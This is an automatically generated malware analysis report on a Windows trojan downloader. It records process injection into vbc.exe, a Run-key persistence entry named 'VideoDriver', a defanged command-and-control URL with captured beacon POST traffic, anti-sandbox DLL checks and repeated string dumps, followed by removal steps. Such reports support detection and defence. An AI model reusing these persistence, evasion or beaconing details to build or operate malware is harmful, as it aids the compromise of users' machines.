Skip to main content

Trojan.Win32.LoadMoney_edf2199994


HEUR:Trojan.Win32.Generic (Kaspersky), TrojanLoadMoney.YR, TrojanDownloaderVundo.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: edf2199994d1a0ef2730391774b0574f

SHA1: b8da3f1c4df1b32e1a973fd2fe7b965a1ea19d9a

SHA256: 1b059fab27aa0661a8336e136fead7ba5115a5178e7f73f186240131683a44ef

SSDeep: 3072:dBWg0WcuUvpEZ/Tqqz47VJ0LrkGODhl/0UrVWCk/EBR8imt:XWg8AT7uJUrxK8N8BaV

Size: 153600 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6

Company: no certificate found

Created at: 2015-02-18 23:14:39

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):No processes have been created.The Trojan injects its code into the following process(es):

vbc.exe:504
%original file name%.exe:580

Mutexes

The following mutexes were created/opened:

ShimCacheMutex

File activity

The process vbc.exe:504 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\config\software (326 bytes)
%System%\config\SOFTWARE.LOG (1315 bytes)

The Trojan deletes the following file(s):

%WinDir%\1418334051\lsass (0 bytes)

The process %original file name%.exe:580 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe (153 bytes)

Registry activity

The process vbc.exe:504 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 15 D5 47 EE D9 7D 16 93 8E BB 89 56 D7 FA 6B"

The Trojan deletes the following value(s) in system registry:


The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"*1418334051"

The process %original file name%.exe:580 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 95 A7 72 0B 01 21 FF C6 1D EC FB 88 94 38 44"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"VideoDriver" = "%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe"

Dropped PE files

MD5 File path
67f5238229333c061092f5a32e8c2ee1c:\WINDOWS\1418334051\lsass

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\config\software (326 bytes)
    %System%\config\SOFTWARE.LOG (1315 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe (153 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "VideoDriver" = "%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name: dge
Product Version: 1.0.0.0
Legal Copyright: Copyright (c)
Legal Trademarks:
Original Filename: dge3.exe
Internal Name: dge3.exe
File Version: 1.0.0.0
File Description: dge
Comments:
Language: English

Company Name: Product Name: dgeProduct Version: 1.0.0.0Legal Copyright: Copyright (c) Legal Trademarks: Original Filename: dge3.exeInternal Name: dge3.exeFile Version: 1.0.0.0File Description: dgeComments: Language: English

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text81921506121510405.42786270f60416938301061a7d215a3dac394
.rsrc163840129615362.643954a52917006d4306a7fe177d678015a9f
.reloc172032125120.07063979737747aaf2d243a456ab7612074458

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://hacka4life.atwebpages.com/panel/gate.php83.125.22.211
hxxp://hacka4life.atwebpages.com:80/panel/gate.php83.125.22.211

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /panel/gate.php HTTP/1.1

Host: hacka4life.atwebpages.com:80

Connection: close

Content-Type: application/x-www-form-urlencoded

Cache-Control: no-cache

Content-Length: 436

a=dnNwbW5raGlmY2RheHVnYnl0cW9sd3JqZXo6d3Rxcm9saWpnZGVieXp1cG1raGN4ZmFzbnY=&b=gHR5dGU6drVfZWF0gHVqZDcyMTisMDRsMDd3NDU0MTEyZTJiODFiOGQ4MDZlNsE3MsY5NrZ8drFkOsQmgGJaX2kqpGyxZDcfgGJaX2ZqpGVvOsB8Yrkgb2V5dvcfgGJ1d3l6ZrFtd2V8&c=vvsspqqnnroolllijjggddeb

HTTP/1.1 200 OK

Date: Sun, 01 Mar 2015 03:10:50 GMT

Server: Apache

Content-Length: 60

Connection: close

Con

POST /panel/gate.php HTTP/1.1

Host: hacka4life.atwebpages.com:80

Connection: close

Content-Type: application/x-www-form-urlencoded

Cache-Control: no-cache

Content-Length: 468

a=bGlmZ2RlYnl6d3Rxcm9tanh1c3BraGNuYXY6dnNwbW5raGlmY3pheHVxbGdkeXRvYmV3cmo=&b=pHR5eGU6h25pZXbvY3g1rWQ6MTE4YfA0YfA3NfQ1NDEgMWUiYTmgYTboODA2ZDYgNfI2OTZqpHBirXY6YWRzrW58YXJlrDt4ODZ8Z2VdZDtoZXNxnG9cpGNjeqVfOlF8h3M6V19YUHg2ZXI6nlEdMC44pG5vnDu0LlB8hqV3OlF8&c=ebcczzzwxuuurrsopmmmjjkh

HTTP/1.1 200 OK

Date: Sun, 01 Mar 2015 03:10:44 GMT

Server: Apache

Content-Length: 60

Connection: close

Content-Type: text/html

ZWJjY3p6end4dXV1cnJzb3BtbW1qamtoZonynWRHVwvohUZfUFRxn2ZBPT0K..

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

vbc.exe_504:

.text

.text

P`.data

P`.data

.rdata

.rdata

`@.eh_fram

`@.eh_fram

0@.bss

0@.bss

.idata

.idata

tL

tL

HpiGjC6poKKJFMdfmGQsI5uhj5PYLApwet655VSJtkKTpLJWQLjgArOIiQDm28YYthWGtuayR4eZdfbrLyhq8D0UW0J2jCW5L9ItMESBTdxNTFZvmvbcjuLIJTv7LA`yIuD5xYRbIB4uh-zy8lbX3u89aj`cNtNFIAxz7CPRvcgwG0tXtQ1oeVIauFRAKSQw33HBdvlLejtdr8Ma6iDVI4k8DuX96QaneKsAXqZbwp9bfKOYBewACUkYehN-UqEQS8U`eIBgqzAqrAq3yL0KjcWCXQQ`H02f18kAybb8cwpgOSp2fwN2ZVVILcKR7HTiDPJ`y5w737tO5yOOL5x973TBmhBcKp2g8o`ehq1H7saiz`LzvH6Igkk8IHryAUP2UDQxfn0UMJva03Dr57Hs9uF53WabeNUKwAqG99HKheyyVtSu7sk0qflEJ4t5`H2IB141j4cyQsYNXn`uiBzX9Osqjxz1JsjwJ-vqOUgZJSzqyNUotPGHRPPtirMjag1xWO`ZqqtTeRq`Du1yH2Jj2XMftJWwf8nqrquwISsKatl4wy2eX2Box2yuco7Rr9QDuVLq5Lk3IP4jc2fN00Gd9soS9GKZzMOhcm7QWC9r4xTYcWQ8BZqW6Nn6QGTBmK`SoQfngRpTUt6hIF4Ng50MutuMmPxxB`Nm3UJhCIwtG4Yk4dubO`f4TawJnaIXTdiujiyeVLzW`r2leprFV3hLO0uyF-qSzU-XOzpISf6Wkc5qSW19tBEJRERYgmgbBf`WaFUaDVTN-TaiERrEvCFGix6Q22f1AXYHRRwUmh008OwwreMb0jVXNUXOcn8cvs5hr3ksBVL0uRTUbuhA7xB5621lFVc22G1pvm1-DAsozM4V3FsCg6r-eA-nGP6TiIq84AJ1KR0c4fVlNBNripOtJHcyaAaU3ftPrqqNwiWRtRTHmA06i9nYlLfArr0zbNwi9x4DlE9wtymaUaIdJ-HBp5dYV8403MWRv4eC242xo7sd2gfijFnF4N346wDE9VkmnuKNFfV79BdoOEJvM4vtDW8TzYnD`PoOtAAQIESdcwVht`5L8T`SekbkknK`0MMX`be89njHcj7lxG5OT`iz`Wy`7zl0XVA1Y6litBLu9o9CEWkMQd4sObxbHkI6bT5gfWQ6GW65uvOMiaqEZZLmD`c6hSzqLg`YX1nTI4nqEL9K4fF-Xj0rRjv7bEVhIAP3`9x-tz4lfzM~

HpiGjC6poKKJFMdfmGQsI5uhj5PYLApwet655VSJtkKTpLJWQLjgArOIiQDm28YYthWGtuayR4eZdfbrLyhq8D0UW0J2jCW5L9ItMESBTdxNTFZvmvbcjuLIJTv7LA`yIuD5xYRbIB4uh-zy8lbX3u89aj`cNtNFIAxz7CPRvcgwG0tXtQ1oeVIauFRAKSQw33HBdvlLejtdr8Ma6iDVI4k8DuX96QaneKsAXqZbwp9bfKOYBewACUkYehN-UqEQS8U`eIBgqzAqrAq3yL0KjcWCXQQ`H02f18kAybb8cwpgOSp2fwN2ZVVILcKR7HTiDPJ`y5w737tO5yOOL5x973TBmhBcKp2g8o`ehq1H7saiz`LzvH6Igkk8IHryAUP2UDQxfn0UMJva03Dr57Hs9uF53WabeNUKwAqG99HKheyyVtSu7sk0qflEJ4t5`H2IB141j4cyQsYNXn`uiBzX9Osqjxz1JsjwJ-vqOUgZJSzqyNUotPGHRPPtirMjag1xWO`ZqqtTeRq`Du1yH2Jj2XMftJWwf8nqrquwISsKatl4wy2eX2Box2yuco7Rr9QDuVLq5Lk3IP4jc2fN00Gd9soS9GKZzMOhcm7QWC9r4xTYcWQ8BZqW6Nn6QGTBmK`SoQfngRpTUt6hIF4Ng50MutuMmPxxB`Nm3UJhCIwtG4Yk4dubO`f4TawJnaIXTdiujiyeVLzW`r2leprFV3hLO0uyF-qSzU-XOzpISf6Wkc5qSW19tBEJRERYgmgbBf`WaFUaDVTN-TaiERrEvCFGix6Q22f1AXYHRRwUmh008OwwreMb0jVXNUXOcn8cvs5hr3ksBVL0uRTUbuhA7xB5621lFVc22G1pvm1-DAsozM4V3FsCg6r-eA-nGP6TiIq84AJ1KR0c4fVlNBNripOtJHcyaAaU3ftPrqqNwiWRtRTHmA06i9nYlLfArr0zbNwi9x4DlE9wtymaUaIdJ-HBp5dYV8403MWRv4eC242xo7sd2gfijFnF4N346wDE9VkmnuKNFfV79BdoOEJvM4vtDW8TzYnD`PoOtAAQIESdcwVht`5L8T`SekbkknK`0MMX`be89njHcj7lxG5OT`iz`Wy`7zl0XVA1Y6litBLu9o9CEWkMQd4sObxbHkI6bT5gfWQ6GW65uvOMiaqEZZLmD`c6hSzqLg`YX1nTI4nqEL9K4fF-Xj0rRjv7bEVhIAP3`9x-tz4lfzM~

libgcj-13.dll

libgcj-13.dll

Mozilla/4.0 (compatible)

Mozilla/4.0 (compatible)

%s--%s

%s--%s

%s\B%i.tmp

%s\B%i.tmp

http.

http.

hXXp://

hXXp://

hXXps://

hXXps://

%y%m%d

%y%m%d

%s:%i

%s:%i

%s\browser%li.html

%s\browser%li.html

%s "%s"

%s "%s"

Software\Microsoft\Windows NT\CurrentVersion\Windows\load

Software\Microsoft\Windows NT\CurrentVersion\Windows\load

%s\%s.exe

%s\%s.exe

Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore

Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore

NoWindowsUpdate

NoWindowsUpdate

%s@%s

%s@%s

%s\I%li.bat

%s\I%li.bat

%s\U%li.bat

%s\U%li.bat

%s\Google\Chrome\Application\chrome.exe

%s\Google\Chrome\Application\chrome.exe

%s\Internet Explorer\iexplore.exe

%s\Internet Explorer\iexplore.exe

%s\Opera\opera.exe

%s\Opera\opera.exe

%s\Mozilla Firefox\firefox.exe

%s\Mozilla Firefox\firefox.exe

%s\Maxthon3\Bin\Maxthon.exe

%s\Maxthon3\Bin\Maxthon.exe

Google Chrome

Google Chrome

Opera

Opera

Firefox

Firefox

chrome.exe

chrome.exe

opera.exe

opera.exe

firefox.exe

firefox.exe

iexplore.exe

iexplore.exe

Maxthon.exe

Maxthon.exe

%s(%s)

%s(%s)

|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:

|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:

|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

%s%s%i%s%s%s%s%s

%s%s%i%s%s%s%s%s

%s:%s

%s:%s

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

|type:response|uid:%s|taskid:%i|return:%s|busy:%s|

|type:response|uid:%s|taskid:%i|return:%s|busy:%s|

autoruns.exe

autoruns.exe

explorer.exe

explorer.exe

SbieDll.dll

SbieDll.dll

snxhk.dll

snxhk.dll

dbghelp.dll

dbghelp.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion

SOFTWARE\Microsoft\Windows NT\CurrentVersion

76487-640-1457236-23837

76487-640-1457236-23837

76487-644-3177037-23510

76487-644-3177037-23510

55274-640-2673064-23950

55274-640-2673064-23950

76497-640-6308873-23835

76497-640-6308873-23835

Windows Task Manager

Windows Task Manager

%s %i %i

%s %i %i

.hidden

.hidden

filesearch.stop

filesearch.stop

%s@%s:%i

%s@%s:%i

%s\System32\drivers\etc\protocol

%s\System32\drivers\etc\protocol

%s\Microsoft.NET\Framework\

%s\Microsoft.NET\Framework\

v4.0.30319

v4.0.30319

v2.0.50727

v2.0.50727

\explorer.exe

\explorer.exe

HTTP/1.

HTTP/1.

text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

application/x-www-form-urlencoded

application/x-www-form-urlencoded

HTTP/1.

HTTP/1.

dnsapi.dll

dnsapi.dll

%s & %s

%s & %s

Software\Microsoft\Windows\CurrentVersion\

Software\Microsoft\Windows\CurrentVersion\

\Microsoft\Windows

\Microsoft\Windows

%s%s%s%s%i%s%s

%s%s%s%s%i%s%s

:Zone.Identifier

:Zone.Identifier

%s\K%li.bat

%s\K%li.bat

document.write(unescape('%s'));

document.write(unescape('%s'));

operator

operator

operator

operator

global constructors keyed to

global constructors keyed to

global destructors keyed to

global destructors keyed to

operator""

operator""

VirtualQuery failed for %d bytes at address %p

VirtualQuery failed for %d bytes at address %p

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

Unknown pseudo relocation bit size %d.

fc_key

fc_key

use_fc_key

use_fc_key

hXXp://hacka4life.atwebpages.com/panel/gate.php

hXXp://hacka4life.atwebpages.com/panel/gate.php

v1.0.8

v1.0.8

panel/gate.php

panel/gate.php

hacka4life.atwebpages.com

hacka4life.atwebpages.com

%WinDir%

%WinDir%

%Program Files%

%Program Files%

%Documents and Settings%\All Users

%Documents and Settings%\All Users

%Documents and Settings%\%current user%

%Documents and Settings%\%current user%

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Start Menu\Programs\Startup

%Documents and Settings%\%current user%\Start Menu\Programs\Startup

%Documents and Settings%\All Users\Start Menu\Programs\Startup

%Documents and Settings%\All Users\Start Menu\Programs\Startup

%Program Files%\Internet Explorer\iexplore.exe

%Program Files%\Internet Explorer\iexplore.exe

%Program Files%\Opera\opera.exe

%Program Files%\Opera\opera.exe

%Program Files%\Mozilla Firefox\firefox.exe

%Program Files%\Mozilla Firefox\firefox.exe

%Program Files%\Maxthon3\Bin\Maxthon.exe

%Program Files%\Maxthon3\Bin\Maxthon.exe

e.exe

e.exe

ull)DvwJikPrQzhXXp://hacka4life.atwebpages.com/panel/gate.php80iYitJLxpCUv1.0.8

ull)DvwJikPrQzhXXp://hacka4life.atwebpages.com/panel/gate.php80iYitJLxpCUv1.0.8

%WinDir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe

%WinDir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe

%WinDir%\1418334051

%WinDir%\1418334051

%WinDir%\1418334051\lsass

%WinDir%\1418334051\lsass

RegCloseKey

RegCloseKey

RegCreateKeyExA

RegCreateKeyExA

RegFlushKey

RegFlushKey

RegOpenKeyExA

RegOpenKeyExA

GetProcessHeap

GetProcessHeap

ShellExecuteA

ShellExecuteA

InternetOpenUrlA

InternetOpenUrlA

ADVAPI32.DLL

ADVAPI32.DLL

KERNEL32.DLL

KERNEL32.DLL

msvcrt.dll

msvcrt.dll

SHELL32.DLL

SHELL32.DLL

USER32.dll

USER32.dll

WININET.DLL

WININET.DLL

Okernel32.dll

Okernel32.dll

advapi32.dll

advapi32.dll

Aicmp.dll

Aicmp.dll

surlmon.dll

surlmon.dll

gws2_32.dll

gws2_32.dll

rpcrt4.dll

rpcrt4.dll

vbc.exe_504_rwx_00400000_00083000:

.text

.text

P`.data

P`.data

.rdata

.rdata

`@.eh_fram

`@.eh_fram

0@.bss

0@.bss

.idata

.idata

tL

tL

HpiGjC6poKKJFMdfmGQsI5uhj5PYLApwet655VSJtkKTpLJWQLjgArOIiQDm28YYthWGtuayR4eZdfbrLyhq8D0UW0J2jCW5L9ItMESBTdxNTFZvmvbcjuLIJTv7LA`yIuD5xYRbIB4uh-zy8lbX3u89aj`cNtNFIAxz7CPRvcgwG0tXtQ1oeVIauFRAKSQw33HBdvlLejtdr8Ma6iDVI4k8DuX96QaneKsAXqZbwp9bfKOYBewACUkYehN-UqEQS8U`eIBgqzAqrAq3yL0KjcWCXQQ`H02f18kAybb8cwpgOSp2fwN2ZVVILcKR7HTiDPJ`y5w737tO5yOOL5x973TBmhBcKp2g8o`ehq1H7saiz`LzvH6Igkk8IHryAUP2UDQxfn0UMJva03Dr57Hs9uF53WabeNUKwAqG99HKheyyVtSu7sk0qflEJ4t5`H2IB141j4cyQsYNXn`uiBzX9Osqjxz1JsjwJ-vqOUgZJSzqyNUotPGHRPPtirMjag1xWO`ZqqtTeRq`Du1yH2Jj2XMftJWwf8nqrquwISsKatl4wy2eX2Box2yuco7Rr9QDuVLq5Lk3IP4jc2fN00Gd9soS9GKZzMOhcm7QWC9r4xTYcWQ8BZqW6Nn6QGTBmK`SoQfngRpTUt6hIF4Ng50MutuMmPxxB`Nm3UJhCIwtG4Yk4dubO`f4TawJnaIXTdiujiyeVLzW`r2leprFV3hLO0uyF-qSzU-XOzpISf6Wkc5qSW19tBEJRERYgmgbBf`WaFUaDVTN-TaiERrEvCFGix6Q22f1AXYHRRwUmh008OwwreMb0jVXNUXOcn8cvs5hr3ksBVL0uRTUbuhA7xB5621lFVc22G1pvm1-DAsozM4V3FsCg6r-eA-nGP6TiIq84AJ1KR0c4fVlNBNripOtJHcyaAaU3ftPrqqNwiWRtRTHmA06i9nYlLfArr0zbNwi9x4DlE9wtymaUaIdJ-HBp5dYV8403MWRv4eC242xo7sd2gfijFnF4N346wDE9VkmnuKNFfV79BdoOEJvM4vtDW8TzYnD`PoOtAAQIESdcwVht`5L8T`SekbkknK`0MMX`be89njHcj7lxG5OT`iz`Wy`7zl0XVA1Y6litBLu9o9CEWkMQd4sObxbHkI6bT5gfWQ6GW65uvOMiaqEZZLmD`c6hSzqLg`YX1nTI4nqEL9K4fF-Xj0rRjv7bEVhIAP3`9x-tz4lfzM~

HpiGjC6poKKJFMdfmGQsI5uhj5PYLApwet655VSJtkKTpLJWQLjgArOIiQDm28YYthWGtuayR4eZdfbrLyhq8D0UW0J2jCW5L9ItMESBTdxNTFZvmvbcjuLIJTv7LA`yIuD5xYRbIB4uh-zy8lbX3u89aj`cNtNFIAxz7CPRvcgwG0tXtQ1oeVIauFRAKSQw33HBdvlLejtdr8Ma6iDVI4k8DuX96QaneKsAXqZbwp9bfKOYBewACUkYehN-UqEQS8U`eIBgqzAqrAq3yL0KjcWCXQQ`H02f18kAybb8cwpgOSp2fwN2ZVVILcKR7HTiDPJ`y5w737tO5yOOL5x973TBmhBcKp2g8o`ehq1H7saiz`LzvH6Igkk8IHryAUP2UDQxfn0UMJva03Dr57Hs9uF53WabeNUKwAqG99HKheyyVtSu7sk0qflEJ4t5`H2IB141j4cyQsYNXn`uiBzX9Osqjxz1JsjwJ-vqOUgZJSzqyNUotPGHRPPtirMjag1xWO`ZqqtTeRq`Du1yH2Jj2XMftJWwf8nqrquwISsKatl4wy2eX2Box2yuco7Rr9QDuVLq5Lk3IP4jc2fN00Gd9soS9GKZzMOhcm7QWC9r4xTYcWQ8BZqW6Nn6QGTBmK`SoQfngRpTUt6hIF4Ng50MutuMmPxxB`Nm3UJhCIwtG4Yk4dubO`f4TawJnaIXTdiujiyeVLzW`r2leprFV3hLO0uyF-qSzU-XOzpISf6Wkc5qSW19tBEJRERYgmgbBf`WaFUaDVTN-TaiERrEvCFGix6Q22f1AXYHRRwUmh008OwwreMb0jVXNUXOcn8cvs5hr3ksBVL0uRTUbuhA7xB5621lFVc22G1pvm1-DAsozM4V3FsCg6r-eA-nGP6TiIq84AJ1KR0c4fVlNBNripOtJHcyaAaU3ftPrqqNwiWRtRTHmA06i9nYlLfArr0zbNwi9x4DlE9wtymaUaIdJ-HBp5dYV8403MWRv4eC242xo7sd2gfijFnF4N346wDE9VkmnuKNFfV79BdoOEJvM4vtDW8TzYnD`PoOtAAQIESdcwVht`5L8T`SekbkknK`0MMX`be89njHcj7lxG5OT`iz`Wy`7zl0XVA1Y6litBLu9o9CEWkMQd4sObxbHkI6bT5gfWQ6GW65uvOMiaqEZZLmD`c6hSzqLg`YX1nTI4nqEL9K4fF-Xj0rRjv7bEVhIAP3`9x-tz4lfzM~

libgcj-13.dll

libgcj-13.dll

Mozilla/4.0 (compatible)

Mozilla/4.0 (compatible)

%s--%s

%s--%s

%s\B%i.tmp

%s\B%i.tmp

http.

http.

hXXp://

hXXp://

hXXps://

hXXps://

%y%m%d

%y%m%d

%s:%i

%s:%i

%s\browser%li.html

%s\browser%li.html

%s "%s"

%s "%s"

Software\Microsoft\Windows NT\CurrentVersion\Windows\load

Software\Microsoft\Windows NT\CurrentVersion\Windows\load

%s\%s.exe

%s\%s.exe

Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore

Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore

NoWindowsUpdate

NoWindowsUpdate

%s@%s

%s@%s

%s\I%li.bat

%s\I%li.bat

%s\U%li.bat

%s\U%li.bat

%s\Google\Chrome\Application\chrome.exe

%s\Google\Chrome\Application\chrome.exe

%s\Internet Explorer\iexplore.exe

%s\Internet Explorer\iexplore.exe

%s\Opera\opera.exe

%s\Opera\opera.exe

%s\Mozilla Firefox\firefox.exe

%s\Mozilla Firefox\firefox.exe

%s\Maxthon3\Bin\Maxthon.exe

%s\Maxthon3\Bin\Maxthon.exe

Google Chrome

Google Chrome

Opera

Opera

Firefox

Firefox

chrome.exe

chrome.exe

opera.exe

opera.exe

firefox.exe

firefox.exe

iexplore.exe

iexplore.exe

Maxthon.exe

Maxthon.exe

%s(%s)

%s(%s)

|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:

|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:

|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

%s%s%i%s%s%s%s%s

%s%s%i%s%s%s%s%s

%s:%s

%s:%s

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

|type:response|uid:%s|taskid:%i|return:%s|busy:%s|

|type:response|uid:%s|taskid:%i|return:%s|busy:%s|

autoruns.exe

autoruns.exe

explorer.exe

explorer.exe

SbieDll.dll

SbieDll.dll

snxhk.dll

snxhk.dll

dbghelp.dll

dbghelp.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion

SOFTWARE\Microsoft\Windows NT\CurrentVersion

76487-640-1457236-23837

76487-640-1457236-23837

76487-644-3177037-23510

76487-644-3177037-23510

55274-640-2673064-23950

55274-640-2673064-23950

76497-640-6308873-23835

76497-640-6308873-23835

Windows Task Manager

Windows Task Manager

%s %i %i

%s %i %i

.hidden

.hidden

filesearch.stop

filesearch.stop

%s@%s:%i

%s@%s:%i

%s\System32\drivers\etc\protocol

%s\System32\drivers\etc\protocol

%s\Microsoft.NET\Framework\

%s\Microsoft.NET\Framework\

v4.0.30319

v4.0.30319

v2.0.50727

v2.0.50727

\explorer.exe

\explorer.exe

HTTP/1.

HTTP/1.

text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

application/x-www-form-urlencoded

application/x-www-form-urlencoded

HTTP/1.

HTTP/1.

dnsapi.dll

dnsapi.dll

%s & %s

%s & %s

Software\Microsoft\Windows\CurrentVersion\

Software\Microsoft\Windows\CurrentVersion\

\Microsoft\Windows

\Microsoft\Windows

%s%s%s%s%i%s%s

%s%s%s%s%i%s%s

:Zone.Identifier

:Zone.Identifier

%s\K%li.bat

%s\K%li.bat

document.write(unescape('%s'));

document.write(unescape('%s'));

operator

operator

operator

operator

global constructors keyed to

global constructors keyed to

global destructors keyed to

global destructors keyed to

operator""

operator""

VirtualQuery failed for %d bytes at address %p

VirtualQuery failed for %d bytes at address %p

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

Unknown pseudo relocation bit size %d.

fc_key

fc_key

use_fc_key

use_fc_key

hXXp://hacka4life.atwebpages.com/panel/gate.php

hXXp://hacka4life.atwebpages.com/panel/gate.php

v1.0.8

v1.0.8

panel/gate.php

panel/gate.php

hacka4life.atwebpages.com

hacka4life.atwebpages.com

%WinDir%

%WinDir%

%Program Files%

%Program Files%

%Documents and Settings%\All Users

%Documents and Settings%\All Users

%Documents and Settings%\%current user%

%Documents and Settings%\%current user%

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Start Menu\Programs\Startup

%Documents and Settings%\%current user%\Start Menu\Programs\Startup

%Documents and Settings%\All Users\Start Menu\Programs\Startup

%Documents and Settings%\All Users\Start Menu\Programs\Startup

%Program Files%\Internet Explorer\iexplore.exe

%Program Files%\Internet Explorer\iexplore.exe

%Program Files%\Opera\opera.exe

%Program Files%\Opera\opera.exe

%Program Files%\Mozilla Firefox\firefox.exe

%Program Files%\Mozilla Firefox\firefox.exe

%Program Files%\Maxthon3\Bin\Maxthon.exe

%Program Files%\Maxthon3\Bin\Maxthon.exe

e.exe

e.exe

ull)DvwJikPrQzhXXp://hacka4life.atwebpages.com/panel/gate.php80iYitJLxpCUv1.0.8

ull)DvwJikPrQzhXXp://hacka4life.atwebpages.com/panel/gate.php80iYitJLxpCUv1.0.8

%WinDir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe

%WinDir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe

%WinDir%\1418334051

%WinDir%\1418334051

%WinDir%\1418334051\lsass

%WinDir%\1418334051\lsass

RegCloseKey

RegCloseKey

RegCreateKeyExA

RegCreateKeyExA

RegFlushKey

RegFlushKey

RegOpenKeyExA

RegOpenKeyExA

GetProcessHeap

GetProcessHeap

ShellExecuteA

ShellExecuteA

InternetOpenUrlA

InternetOpenUrlA

ADVAPI32.DLL

ADVAPI32.DLL

KERNEL32.DLL

KERNEL32.DLL

msvcrt.dll

msvcrt.dll

SHELL32.DLL

SHELL32.DLL

USER32.dll

USER32.dll

WININET.DLL

WININET.DLL

Okernel32.dll

Okernel32.dll

advapi32.dll

advapi32.dll

Aicmp.dll

Aicmp.dll

surlmon.dll

surlmon.dll

gws2_32.dll

gws2_32.dll

rpcrt4.dll

rpcrt4.dll

%original file name%.exe_580_rwx_00CE0000_00001000:

..hx%

..hx%